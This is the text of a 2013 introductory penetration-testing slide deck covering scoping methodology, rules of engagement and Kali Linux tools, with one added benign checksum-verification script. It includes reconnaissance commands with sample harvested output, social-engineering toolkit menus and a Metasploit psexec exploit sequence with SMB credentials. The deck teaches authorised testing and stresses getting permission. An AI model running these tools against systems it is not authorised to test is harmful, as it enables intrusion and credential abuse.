
(1)

© 2013 Wilkinson Technology Services

Wilkinson Technology

Introduction to Penetration Testing

Paul D. Robertson

[email protected]

@compuwar

(2)

Speaker Bio

Paul D. Robertson

Chief Technology Officer and Chief Information Security Officer

Wilkinson Technology Services

(3)


Penetration Testing - Definition

NIST SP 800-115 - Technical Guide to Information Security Testing and Assessment

Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

(4)

Caveats

Know the legality of what you’re doing before you do it.

Get Permission.

Just being able to run canned tools isn’t usually enough.

Worry about 3rd parties.

Always test your tools in a controlled environment.

Insurance is a good thing.

(5)


OSSTMM

Open Source Security Testing Methodology Manual

One of many methodologies - none of them canonical

(6)

Defining A Security Test

1. Define what you want to protect. These are the assets. The protection mechanisms for these assets are the Controls you will test to identify Limitations.

2. Identify the area around the assets which includes the protection mechanisms and the processes or services built around the assets. This is where interaction with assets will take place. This is your engagement zone.

(7)


Defining A Security Test

3. Define everything outside the engagement zone that you need to keep your assets operational. This may include things you may not be able to directly influence like electricity, food, water, air, stable ground, information, legislation, regulations and things you may be able to work with like dryness, warmth, coolness, clarity, contractors, colleagues, branding, partnerships, and so on. Also count that which keeps the infrastructure operational like processes, protocols, and continued resources. This is your test scope.

(8)

Defining A Security Test (Cont.)

4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside, department A to department B, etc. These are your vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.

(9)


Defining A Security Test (Cont.)

5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways, however here they have been classified by function as five channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.

(10)

Defining A Security Test (Cont.)

6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.

(11)


Defining A Security Test (Cont.)

7. Assure the security test you have defined is in compliance to the Rules of Engagement, a guideline to assure the process for a proper security test without creating misunderstandings,

(12)

Scope

The scope is the total possible operating security environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.

(13)


Scope

Classes are used to define an area of study, investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.

(14)

Scope (Cont.)

It must be made clear that a security analysis must be restricted to that which is within a type of certainty (not to be confused with risk which is not a certainty but a probability). These restrictions include:

1. Non-events such as a volcano eruption where no volcano exists

2. Non-impact like moonlight through a data center window

3. Global-impacting such as a catastrophic meteor impact.

While a thorough security audit requires testing all five channels, realistically, tests are conducted and categorized by the required expertise of the Analyst and the required equipment for the audit.

(15)


Scope (Cont.)

Classes:

Physical Security (PHYSSEC)

Spectrum Security (SPECSEC)

(16)

Scope (Cont.)

Physical Security Channels

Human: Comprises the human element of communication where interaction is either physical or psychological.

Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.

(17)


Scope (Cont.)

Spectrum Security Channel

Wireless: Comprises all electronic communications, signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.

(18)

Common Test Types

Blind: No prior target knowledge.

Double Blind: No prior target knowledge and no target notification.

Gray Box: Limited target knowledge

Double Gray Box: Limited target knowledge, target knows timeframe of test.

Tandem: Full information on both sides.

Reversal: Full information for attacker, no information for defenders.

(19)


Rules of Engagement

What’s in scope?

What’s allowed?

NDAs, contracts, get out of jail free cards…

Required reporting elements.

(20)

Testing

Passive information collection

Active information collection

Actively test assets

(21)


Tools

Toolbox

(22)

Test Environment

MSDN/Technet

Virtual/Physical

Test Software Revisions!

Keep old versions!

(23)


Toolbox

Kali Linux is the main tool we’ll be discussing

Replacement for Backtrack Linux

Designed for Pentesting

Debian-based

(24)

Kali Linux

Lives at http://www.kali.org

(25)


Kali Linux

Check your checksum after downloading! Linux: sha1sum, OSX: shasum

Validate the SHA1 file with GPG - it’s in the docs - next slide…

Can run “live” from DVD or USB or install in a VM or on hardware

Can add persistence to USB installs

Dual boot isn’t always trivial, neither is EFI boot

If you run in a VM, you need a USB-based wireless adapter to attack wireless networks.

Kernels are already patched for wireless injection

ARM versions available
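An added example, not from the slides, showing the two download checks above as a POSIX shell script: verify the detached GPG signature on the published SHA1SUMS file first, then compare the image’s SHA-1 against the entry in that file. It assumes the checksum file is named SHA1SUMS with a detached signature SHA1SUMS.gpg and that the vendor’s signing key (see the Kali docs) is already in your keyring.

```shell
#!/bin/sh
# Added example, not from the slides: verify a downloaded image the way the
# "check your checksum" and "validate the SHA1 file with GPG" bullets describe.
# Assumes SHA1SUMS plus a detached signature SHA1SUMS.gpg, and that the vendor's
# signing key has already been imported into the local GPG keyring.
set -u

# check_sha1 FILE SUMSFILE: succeed only if SUMSFILE lists FILE's basename and
# the recorded SHA-1 equals the one computed locally.
check_sha1() {
    file=$1
    sums=$2
    name=$(basename "$file")
    # Pick the one entry for this image; running sha1sum -c on the whole file
    # would fail on every other image listed that we did not download.
    expected=$(grep " [*]\{0,1\}$name\$" "$sums" | awk '{print $1}' | head -n 1)
    if [ -z "$expected" ]; then
        echo "no checksum for $name in $sums" >&2
        return 1
    fi
    actual=$(sha1sum "$file" | awk '{print $1}')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $name"
        return 0
    fi
    echo "MISMATCH: $name expected $expected got $actual" >&2
    return 1
}

# verify_sums_signature SUMSFILE SIGFILE: an unsigned checksum file proves
# nothing, since whoever swapped the image on a mirror can swap SHA1SUMS too.
verify_sums_signature() {
    gpg --verify "$2" "$1" 2>/dev/null
}

# verify_image ISO SUMSFILE SIGFILE: signature first, then the checksum.
verify_image() {
    verify_sums_signature "$2" "$3" || {
        echo "signature on $2 did not verify" >&2
        return 1
    }
    check_sha1 "$1" "$2"
}

# Usage: verify_image kali-linux.iso SHA1SUMS SHA1SUMS.gpg
```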

(26)

Kali Linux

RTFM!

http://docs.kali.org

http://docs.kali.org/pdf/kali-book-en.pdf

http://forums.kali.org

irc.freenode.net #kali-linux

(27)


Kali Linux

Caveats:

Not really designed for complete newbies

Updates routinely break things - snapshot VMs

Use pass-through, not NAT for VMs

There are more than 300 tools in the distribution - you won’t always find information for them all

(28)

Kali Linux

Relatively easy to build your own custom version from within.

Unlike Backtrack, everything is filesystem standard - no more of that /pentest stuff!

Command help is sometimes off a bit - just use the command directly, it’s in the path.


(30)

Kali Linux

Good Targets:

https://www.pentesterlab.com/ http://vulnhub.com/

(31)


theharvester

Applications -> Kali Linux -> Information Gathering -> OSINT Analysis

Example is wrong - no need for ./ or .py

theharvester -d targetdomain -b google -l 500

theharvester -d targetdomain -b linkedin

Using -b all will sometimes give strange results

Can redirect to a file

(32)

theharvester

theharvester -d mydomain.foo -b all
[+] Emails found:
[email protected]
[email protected]
[email protected]
[email protected]
p…@mydomain.foo
[email protected]

(33)


theharvester

theharvester -d mydomain.foo -b all
[+] Hosts found in search engines:
---
127.0.0.110:www.mydomain.foo
127.0.0.110:dns1.mydomain.foo
127.0.0.22:dns2.mydomain.foo
127.10.0.110:www.mydomain.foo
[+] Virtual hosts
---
127.0.0.110 otherdomain.bar
127.0.0.110 yetanother.baz
127.0.0.110 otherdomain.baz
127.0.0.110 www.mydomain.foo

(34)

theharvester

I have found that theharvester finds things in Google that the Metasploit auxiliary/gather/search_email_collector

(35)


DNS

dnsrecon -d mydomain

dnsenum mydomain

Both allow usage of a wordlist to enumerate potential hostnames.

Wordlists live in /usr/share/wordlist

rockyou is gzipped

(36)

DNS

In metasploit

use auxiliary/gather/enum_dns

set DOMAIN mydomain

set ENUM_BRT true

set WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt

set ENUM_AXFR false

(37)


OpenVAS

Good (not great) vulnerability scanner

Forked from Nessus before everything went commercial

Run the setup first to set up the admin password and start the engines

GSD is difficult to navigate - use GSA if you can

Use domain credentials if you can and filter for high and medium vulns

Use openvas-nvt-sync before starting up each time

(38)

SET

se-toolkit

1) Social-Engineering Attacks

2) Fast-Track Penetration Testing

3) Third Party Modules

4) Update the Metasploit Framework

5) Update the Social-Engineer Toolkit

6) Update SET configuration

(39)


SET

se-toolkit

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Infectious Media Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduino-Based Attack Vector

7) SMS Spoofing Attack Vector

8) Wireless Access Point Attack Vector

9) QRCode Generator Attack Vector

10) Powershell Attack Vectors

(40)

Fern Wi-Fi Cracker

GUI tool

WPA, WPA2 and WEP

Wordlists supported

(41)


Metasploit

service postgresql start

service metasploit start

msfconsole

(42)

Metasploit

use exploit/windows/smb/psexec

set LHOST 10.0.0.1

set RHOST 10.0.0.127

set SMBUser victim

set SMBPass password

exploit

(46)

Teensy 3.0

$20.00

Can act as a USB HID

Add the Teensyduino code to the Arduino IDE to load sketches

Commonly plays as an Apple USB keyboard, which is welcomed by Win*, OSX and most GUI Linuxes

(47)


Kautilya

http://code.google.com/kautilya

Contains many Teensy payloads

(48)

Demo Time

(49)


Wilkinson Technology

Wilkitech
